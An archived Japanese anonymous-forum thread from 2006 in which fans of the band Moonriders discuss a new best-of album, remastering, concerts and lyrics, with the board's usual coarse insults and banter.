歌詞の変態加減とか、けったいなアレンジとか。

383 :伝説の名無しさん:2006/07/13(木) 10:34:50
フジファブはいいね、オレも好きだ。
取り替えがきかないオリジナリティがあるよね。
初期のXTCみたいなオルガンが入ってたりするのも面白い。

384 :伝説の名無しさん:2006/07/13(木) 15:43:39
どっちも、言う程変態ではない

385 :伝説の名無しさん:2006/07/13(木) 16:00:20
下らない事、書かなくてもいいよ。
お前等全員ね。

386 :伝説の名無しさん:2006/07/13(木) 16:30:10
どうでもいいけど博文ブログのコメント欄に張り付いてるMIHOとかいうのキモイ。


387 :伝説の名無しさん:2006/07/13(木) 18:50:56
いかにもふうちゃん信者っぽい

388 :伝説の名無しさん:2006/07/13(木) 18:57:18
アジカン、フジファブリック、ナンバーガール、くるり。
それぞれに微妙に被ってる所が有るし、遠目には似たようなものだと思うんだけど、
その中でフジファブリックだけは興味の対象の外だな。
他はそれぞれに独自の事を目指してて良いバンドが増えたなあとか思うんだけど。

389 :伝説の名無しさん:2006/07/13(木) 18:59:48
>386

ここに張り付いてるお前もキモイけど

390 :伝説の名無しさん:2006/07/13(木) 22:49:18
今日も映画館に雨が降る

391 :伝説の名無しさん:2006/07/14(金) 00:26:00
ペイル・コクーンの挿入曲って誰が歌ってるんだ?
作曲は岡田徹だったが。

392 :伝説の名無しさん:2006/07/14(金) 00:41:06
はちみつぱいのスレはないんですか?

393 :伝説の名無しさん:2006/07/14(金) 01:24:59
お前が勝手に立てればいいじゃん。

394 :伝説の名無しさん:2006/07/14(金) 01:43:41
ぱいの話ならここですれば?

395 :伝説の名無しさん:2006/07/14(金) 01:58:41
おい、俺の話も聞け

396 :伝説の名無しさん:2006/07/14(金) 06:32:51
はちみつぱいとムーンライダーズは別のバンドと考えた方がいい

397 :伝説の名無しさん:2006/07/14(金) 11:02:01
メンバーがかぶるだけで、完全に別のバンドだね。


398 :伝説の名無しさん:2006/07/14(金) 13:21:36
お前の主観なんかどうでもいいよ。

399 :伝説の名無しさん:2006/07/14(金) 13:53:25
コメント欄閉じたね、フーチャンもうざいと思ってたのかな?

400 :伝説の名無しさん:2006/07/14(金) 17:18:12
>399

それを気にするお前もうざいけど

401 :伝説の名無しさん:2006/07/14(金) 20:17:19
>>400
389もおまえだろ? いちいちおまえもキモイしうざいよ

402 :伝説の名無しさん:2006/07/14(金) 20:44:16
>399
いちいちblogのコメントのことなんか書き込むなよ。
うざいならあっちに直接書けよ。


403 :伝説の名無しさん:2006/07/14(金) 22:00:38
とりあえずお前等今夜中に死ねよ。

404 :伝説の名無しさん:2006/07/14(金) 22:28:55
はい

405 :伝説の名無しさん:2006/07/14(金) 22:31:31
素直なのは良い事ですが、嘘をつくのは良くない事です。
出来ない約束をするのが一番いけません。

406 :伝説の名無しさん:2006/07/14(金) 22:47:17
お前等全員「僕は幸せだった」聴いてから死んでくれ。
なんて醜く素敵なスレなんだ。

407 :伝説の名無しさん:2006/07/14(金) 23:30:27
今夜こそはお前等を残し旅立つつもりだった
こんなに暑くなければ

408 :伝説の名無しさん:2006/07/14(金) 23:42:43
>>407
ピクニックに行こう急いで森へ〜♪

409 :伝説の名無しさん:2006/07/15(土) 00:14:50
ライダーズ聴いてる女のS・E・Xなんかしたくもない。

410 :伝説の名無しさん:2006/07/15(土) 00:49:00
やべやべ、、「metrotr-on-line 2006 july」の通販申し込み忘れてた。

411 :伝説の名無しさん:2006/07/15(土) 11:11:32
>>410
届いたら、どんな感じか教えてくれ。

412 :伝説の名無しさん:2006/07/16(日) 02:17:26
あらゆる液体が出る pissin'

413 :伝説の名無しさん:2006/07/16(日) 02:27:43
ファンクラブページの日記みたけどクラウン時代の再発出るみたいね
ボーナストラックとか付いてるといいなぁ。
まああの音質が多少ましになるだけでも嬉しいけど

414 :伝説の名無しさん:2006/07/16(日) 19:23:47
そーいやBOXってもうださねーのかな?

415 :伝説の名無しさん:2006/07/16(日) 19:40:03
ドントラライブDVD出してほしいよ

416 :伝説の名無しさん:2006/07/16(日) 21:38:06
ついでにアマチュアアカデミのライブのとアニマルインデックスのも・・・。
どっちも映像残っているのにもったいない

417 :伝説の名無しさん:2006/07/17(月) 00:53:36
10周年、20周年、30周年のライブをBOXで出しておくれw


418 :伝説の名無しさん:2006/07/17(月) 02:12:22
とりあえずコンプリートBOXのPart3を(ry

419 :伝説の名無しさん:2006/07/17(月) 02:41:46
パート3だとカバー2枚〜ポストウォーになんのか?

420 :伝説の名無しさん:2006/07/17(月) 02:53:09
あとアルバム未収録も多いしね

421 :伝説の名無しさん:2006/07/17(月) 08:10:17
晩餐のNHKホールは映像ないのかな。

422 :伝説の名無しさん:2006/07/17(月) 13:48:11
NHKホール行ったよ
前半、慶一がMCのたびに隅にある机まで行って途中で飽きた
後半の名曲大会でやっと元を取った感じになった

423 :伝説の名無しさん:2006/07/17(月) 13:54:52
俺もNHK行ったお
後半の「駅は今朝の中」でfouがボーカルとるところは良かったお

424 :伝説の名無しさん:2006/07/17(月) 17:55:25
NHKホール。俺も燃えたのは「太陽の下の18才」以降だなあ

425 :伝説の名無しさん:2006/07/17(月) 21:30:23
このスレって伝説板のスレの割りには
伸びるの早いっすね。

426 :伝説の名無しさん:2006/07/17(月) 21:50:02
ワイドショー並みに話題が豊富だからねw

ところで、「ザ・スズキ」のDVDが売っていたんだけど、買い?

427 :伝説の名無しさん:2006/07/17(月) 22:16:47
鈴木ファンなら買いで無問題。
逆に鈴木の入門用にはまるで向いてません。

428 :伝説の名無しさん:2006/07/17(月) 22:28:30
今日ライブ行った人いますか?

429 :伝説の名無しさん:2006/07/17(月) 22:36:15
美奈子ちゃんのポスター付き“心を込めて”が売っていたんだけど、
二枚目のポスターも捕獲したほうがいいのかなぁ?

430 :伝説の名無しさん:2006/07/18(火) 03:14:35
どういう誤爆ぢゃ

431 :伝説の名無しさん:2006/07/18(火) 03:46:55
THE SUZUKIのライブどうでした?
ふーちゃんのCD買った人いるかな?
行きたかったな。

432 :伝説の名無しさん:2006/07/18(火) 19:58:13
FC先行予約きた

433 :伝説の名無しさん:2006/07/18(火) 22:49:53
なんの先行予約?

434 :伝説の名無しさん:2006/07/19(水) 02:43:24
さっさと質問に答えろよザコども。

435 :伝説の名無しさん:2006/07/19(水) 02:51:37
え〜?なんで〜?ボクちゃんザコだからわかんなぁ〜い!

436 :sage:2006/07/19(水) 13:28:32
3日前告知
7/22 都内上野パセラにてカラオケオフ開催します
詳細はメール欄へお願いします

437 :伝説の名無しさん:2006/07/19(水) 13:59:17
sagaって何?

438 :伝説の名無しさん:2006/07/19(水) 14:32:44
segaなら知ってる。

439 :伝説の名無しさん:2006/07/19(水) 18:36:52
>>437
性←変換出来た

440 :伝説の名無しさん:2006/07/19(水) 19:25:55
性を語るスレになりましたね

441 :伝説の名無しさん:2006/07/19(水) 20:13:18
Wowoh Wowoh Wowoh 耐えきれ〜ず落とした涙〜 

442 :伝説の名無しさん:2006/07/19(水) 21:06:39
SAGA

443 :伝説の名無しさん:2006/07/19(水) 21:31:47
吹きっさらしの夕陽のドックに海はつながれて風を見ている

444 :伝説の名無しさん:2006/07/19(水) 21:33:21
残したものも残ったものも何もないはずだ夏は終わった

445 :伝説の名無しさん:2006/07/19(水) 21:44:02
くれない不当お届けいたしました

446 :伝説の名無しさん:2006/07/19(水) 22:46:10
「くれない埠頭」はやっぱり博文Voでないと

447 :伝説の名無しさん:2006/07/19(水) 23:08:34
シッティンオンザハーイウェー
シティオンザハーイウェー
いつかは雨に打たれるさ

448 :伝説の名無しさん:2006/07/19(水) 23:27:16
行く当てもない土曜のドライバー 夢を見た日から今日まで走った。

>>446 何をおっしゃる。

449 :伝説の名無しさん:2006/07/19(水) 23:43:29
変な流れ・・・

450 :伝説の名無しさん:2006/07/20(木) 00:01:42
じゃあ俺がダムパール歌ってやる
そらのかなたのー追憶とくちーづけー♪

451 :伝説の名無しさん:2006/07/20(木) 00:19:19
そしてあなたは夜のパール身につけ
また旅にもどる

452 :伝説の名無しさん:2006/07/20(木) 00:23:00
歌詞リレーは永遠のお約束

453 :伝説の名無しさん:2006/07/20(木) 01:03:46
スピッツの新しいヤツのジャケットが、「P.W〜」っぽいと思ってたら、描いたの同じ人だった。

454 :伝説の名無しさん:2006/07/20(木) 03:06:35
誰も江ノ島行かなかったのか・・・
先行予約って何?・・・
歌詞リレーのジサクジエンは終了か?

455 :伝説の名無しさん:2006/07/20(木) 13:58:02
湾岸スタジオも機材変わったのかな
Emuの鍵盤があったな

456 :伝説の名無しさん:2006/07/20(木) 16:39:28
「埠頭」←これなんて読むの?

457 :伝説の名無しさん:2006/07/20(木) 17:49:46
>>456
ちょwwwwおまっwwww

458 :伝説の名無しさん:2006/07/20(木) 18:40:00
秋のツアーのファイナルの渋公埋まるんかなぁ・・・。


459 :伝説の名無しさん:2006/07/20(木) 19:10:18
大丈夫、招待客ばかりだから

460 :伝説の名無しさん:2006/07/21(金) 01:46:43
>>456
きとう

461 :伝説の名無しさん:2006/07/21(金) 08:02:02
なんだ!?これ!?

462 :伝説の名無しさん:2006/07/21(金) 09:41:19
「ぎとう」だろ。
嘘つくの止めろよ!死ねカス!

463 :伝説の名無しさん:2006/07/21(金) 12:53:17
くれないきとうですか。
せつない感じのタイトルですね。

464 :伝説の名無しさん:2006/07/21(金) 15:04:03
痛そうじゃねーか(w

465 :伝説の名無しさん:2006/07/21(金) 18:47:16
紅亀頭
オナニー終えたばかりですね

466 :伝説の名無しさん:2006/07/21(金) 19:15:00
抜きっぱなしの〜

467 :伝説の名無しさん:2006/07/21(金) 19:26:21
夏は終わった

468 :伝説の名無しさん:2006/07/21(金) 21:17:59
スカーレットの誓いって何がスカーレットなんだろうな

469 :伝説の名無しさん:2006/07/21(金) 21:49:46
薔薇がなくちゃ生きていけない

470 :名無し募集中。。。:2006/07/21(金) 22:21:52
僕は走って灰になるって何で走るんだろうな

471 :伝説の名無しさん:2006/07/21(金) 22:29:22
豚になりたくないから
ブーブー

472 :伝説の名無しさん:2006/07/21(金) 22:40:45
度々すみません、最後の告知です
明日、都内カラオケオフ開催します
18時上野パセラです。詳細はメール欄へお願いします

473 :伝説の名無しさん:2006/07/21(金) 22:43:31
sageのままだったorz

474 :伝説の名無しさん:2006/07/22(土) 00:09:37
http://page13.auctions.yahoo.co.jp/jp/auction/r23306579

475 :伝説の名無しさん:2006/07/22(土) 00:41:16
こんな臭いレコード、タダでもイラネーよ馬鹿

476 :伝説の名無しさん:2006/07/22(土) 11:37:11
こんなに毒づいて何の意味があるのかと

477 :伝説の名無しさん:2006/07/23(日) 00:36:15
鬱陶しいな。死ねよ。

478 :伝説の名無しさん:2006/07/23(日) 01:03:33
オッ!?NHK-BSに慶一さん

479 :伝説の名無しさん:2006/07/23(日) 04:16:53
吹きっさらしの夕日のドック、海は繋がれて波をみていた

480 :伝説の名無しさん:2006/07/23(日) 11:25:06
そしたらクラゲが波をたゆうてた

481 :伝説の名無しさん:2006/07/23(日) 12:50:23
なんでこんなに暑いんだろう

482 :伝説の名無しさん:2006/07/24(月) 18:33:21
過疎スレいえーい

483 :伝説の名無しさん:2006/07/24(月) 19:34:45
なんでこんなに居ないんだろう

484 :伝説の名無しさん:2006/07/24(月) 20:11:44
アルバム発売きまったな。これが最後にならないことを祈る

485 :伝説の名無しさん:2006/07/24(月) 21:57:39
おしえてくださひ
sitting on the highwayはわかるけど、
city on the highwayって?
なんのことだろう?


486 :伝説の名無しさん:2006/07/24(月) 22:40:16
シティという車で高速道路を走ったってことでしょ

487 :伝説の名無しさん:2006/07/24(月) 22:49:17
レス有難う御座います。
CITYは車の名前!
なるほど創価!時代を考えねばなりませんな。

488 :伝説の名無しさん:2006/07/25(火) 01:55:29
ホントにそれでいいのか(w

489 :伝説の名無しさん:2006/07/25(火) 02:02:49
http://www.youtube.com/watch?v=6QD0K1LbAps&search=moonriders

490 :伝説の名無しさん:2006/07/25(火) 20:42:40
今年後半のムーンライダーズって期待していいですか?

491 :伝説の名無しさん:2006/07/25(火) 20:54:21
アルバムに全力で期待している。

492 :伝説の名無しさん:2006/07/25(火) 21:18:24
慶一の曲には期待してません

493 :伝説の名無しさん:2006/07/25(火) 21:19:31
ttp://www.towerrecords.co.jp/sitemap/CSfCardMain.jsp?GOODS_NO=981127&GOODS_SORT_CD=101

ベスト版も出るんだね。
まあまあな選曲なので、初心者勧誘用に買おうかと思う。
でも「僕は走って灰になる」はいらんなあ。

494 :伝説の名無しさん:2006/07/25(火) 21:30:51
鬼火もバックシートも入ってないベスト盤なんて意味ないわ

495 :伝説の名無しさん:2006/07/25(火) 21:38:12
鬼火なんて陰気な曲いらねーよ。死ね。

496 :伝説の名無しさん:2006/07/25(火) 21:39:40
なんか要らない曲ばっかり入ってるベストだな。個人的意見だけどw

497 :伝説の名無しさん:2006/07/25(火) 22:06:59
>>495
死ねとか言うなハゲ親父

498 :伝説の名無しさん:2006/07/25(火) 22:09:03
何でこのスレ常在戦場状態なの(w

499 :伝説の名無しさん:2006/07/25(火) 22:19:33
物は壊れる人は死ぬ。そういう訳さ。

500 :伝説の名無しさん:2006/07/25(火) 22:37:06
シングルバージョンは嬉しいな
ゆうがたフレンズも出してくれるのか

501 :伝説の名無しさん:2006/07/25(火) 23:18:14
アンソロジーと大して変わりばえのないラインナップ。
でもリマスタリングされているのが魅力か…迷うな。

502 :伝説の名無しさん:2006/07/25(火) 23:27:59
変わり映えの無いベストだな

503 :伝説の名無しさん:2006/07/25(火) 23:30:15
しかもクラウンから出るんだ・・・和解したか?

504 :伝説の名無しさん:2006/07/25(火) 23:49:31
ドントラも入ってないじゃん
かしぶち作品も1曲もないし
何考えてるんだ


505 :伝説の名無しさん:2006/07/25(火) 23:53:15
ちゃんぽんみたいな組合せだな。1曲目がスペースエイジで
次がマスココか。

頭おかしいセレクトだ。死んでていいよ。
だいたい何枚目のベストだよクズが。

506 :伝説の名無しさん:2006/07/25(火) 23:59:23
いちおうメンバー監修でしょ
そんなこと言ってるとまたK1さんが怒っちゃうわよw

507 :伝説の名無しさん:2006/07/26(水) 00:05:10
何でこのスレ何時も何時も喧嘩上等なの?

508 :伝説の名無しさん:2006/07/26(水) 00:08:59
いとこ同士がないわKのトランクはないわ…ベスト出すたびに不満があるよ俺
リマスタリングたってな、BOXセットの時に一回やってるんでしょ?それとも再リマスタ?

509 :伝説の名無しさん:2006/07/26(水) 00:11:38
>>504
つ気球と通信
つfrou frou

510 :伝説の名無しさん:2006/07/26(水) 00:34:49
>>508
発表した作品が多ければ、その分もれる作品も増えるからしかたないよね。
みんなが納得するベストを出すなら、4枚組くらいのボリュームが必要かも。

511 :伝説の名無しさん:2006/07/26(水) 00:42:30
ライブも同じだよね。みんな聴きたい曲がたくさんあるから、
100曲くらい演奏しなければ必ず不満が出る。

512 :伝説の名無しさん:2006/07/26(水) 01:01:06
古くから続いてるバンドではカシオペアなんか25周年に1年1曲選んで25曲演奏するライブやってるけど、ライダーズは休止期間があるからその方式でベスト作ると30曲にならないな

513 :伝説の名無しさん:2006/07/26(水) 11:47:21
>>489に誰も反応しないなんて

514 :伝説の名無しさん:2006/07/26(水) 14:45:24
「火の玉ボーイ」から1曲も入ってないのは、現在ではK1ソロ認定だから?

515 :伝説の名無しさん:2006/07/26(水) 19:22:20
俺、「さよなら〜」嫌い

516 :伝説の名無しさん:2006/07/26(水) 21:07:07
シティ・オン・ザ・ハイウェイは
ホンダのCMに使われたのですか?


517 :伝説の名無しさん:2006/07/26(水) 22:02:02
つーか、一番耳が悪いメンバーにリマスタリングなんて重要な仕事やらせるなよな!
岡田さんか良明さんがガンバレばいいんだよ!
(クジラさんやフーには任せられないしな、かしぶちさん体調悪いし・・)
K1は毎日愚痴ってCM曲作ってりゃいいんだよ!FUCK!

518 :伝説の名無しさん:2006/07/26(水) 22:28:46
いとこ同士が入ってないじゃん・・・全然ベストじゃないよ

519 :伝説の名無しさん:2006/07/26(水) 22:31:55
難聴とか歌が下手くそなことを誤魔化す方便だから。

520 :伝説の名無しさん:2006/07/26(水) 22:47:58
そっか。じゃ、おれも今日から難聴っと。

521 :伝説の名無しさん:2006/07/26(水) 23:08:02
ムーンライダーズは武川さん以外は全員オンチ

522 :伝説の名無しさん:2006/07/26(水) 23:15:57
メトロトロンどんな感じだった?

523 :伝説の名無しさん:2006/07/26(水) 23:24:37
もし自分がベストの監修するなら三期に分けて三枚組にするな

DISC1 ムーンライダーズ〜CAMERA EGAL STYLO
DISC2 マニア・マニエラ〜ドント・トラスト・オーバー・サーティー
DISC3 最後の晩餐〜PW・ベービーズ・ペーパーバック

524 :伝説の名無しさん:2006/07/26(水) 23:27:46
まあ難聴は本物だが音痴なのも昔から。

クジラさんが一番上手いのは自明として2番手は誰だ?ふーちゃん?

525 :伝説の名無しさん:2006/07/26(水) 23:45:07
火の玉ボーイからも選曲してほしい

526 :伝説の名無しさん:2006/07/26(水) 23:45:18
岡田さんって案外うまいんじゃない?

527 :伝説の名無しさん:2006/07/27(木) 02:46:58
K1がリマスタリングしたのかよ。もうだめぽ。。。

528 :伝説の名無しさん:2006/07/27(木) 11:06:37
慶一人気ないな

529 :伝説の名無しさん:2006/07/27(木) 12:44:17
俺は好きだぜ慶一

530 :伝説の名無しさん:2006/07/27(木) 12:51:54
>528
粘着基地外が1人いるだけだよ

531 :伝説の名無しさん:2006/07/27(木) 14:03:43
慶一が歌ってこそムーンライダーズ。

532 :伝説の名無しさん:2006/07/27(木) 16:43:53
粘着じゃないけど慶一、顔が嫌い。

533 :伝説の名無しさん:2006/07/27(木) 17:14:11
今製作中とやらのアルバムがまたコンセプトアルバムだったらやだ

534 :伝説の名無しさん:2006/07/27(木) 20:59:06
コンセプトは歌詞ではなく、楽曲で示してほしいな。
最近のアルバムはバラバラなのが多いから。

535 :伝説の名無しさん:2006/07/27(木) 22:45:20
ふーちゃんのブログにコメントしてるやつ、バカじゃないの?
状況見てコメントしろよ。

てか、鬱陶しいからコメントも閉鎖したほうがいいよ。


536 :伝説の名無しさん:2006/07/28(金) 00:18:54
>535
ここで文句いってるお前の方がバカじゃないの?
コメント封鎖した方がいいって、直接ふーちゃんに言えば?
アンタが一番鬱陶しい。

537 :伝説の名無しさん:2006/07/28(金) 01:42:15
いま何年かぶりに鈴木白書聴いてる
すげえかっこいい
慶一も歌うまい

あとリラのホテル出してきてそれ聴いてから寝ます

80 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)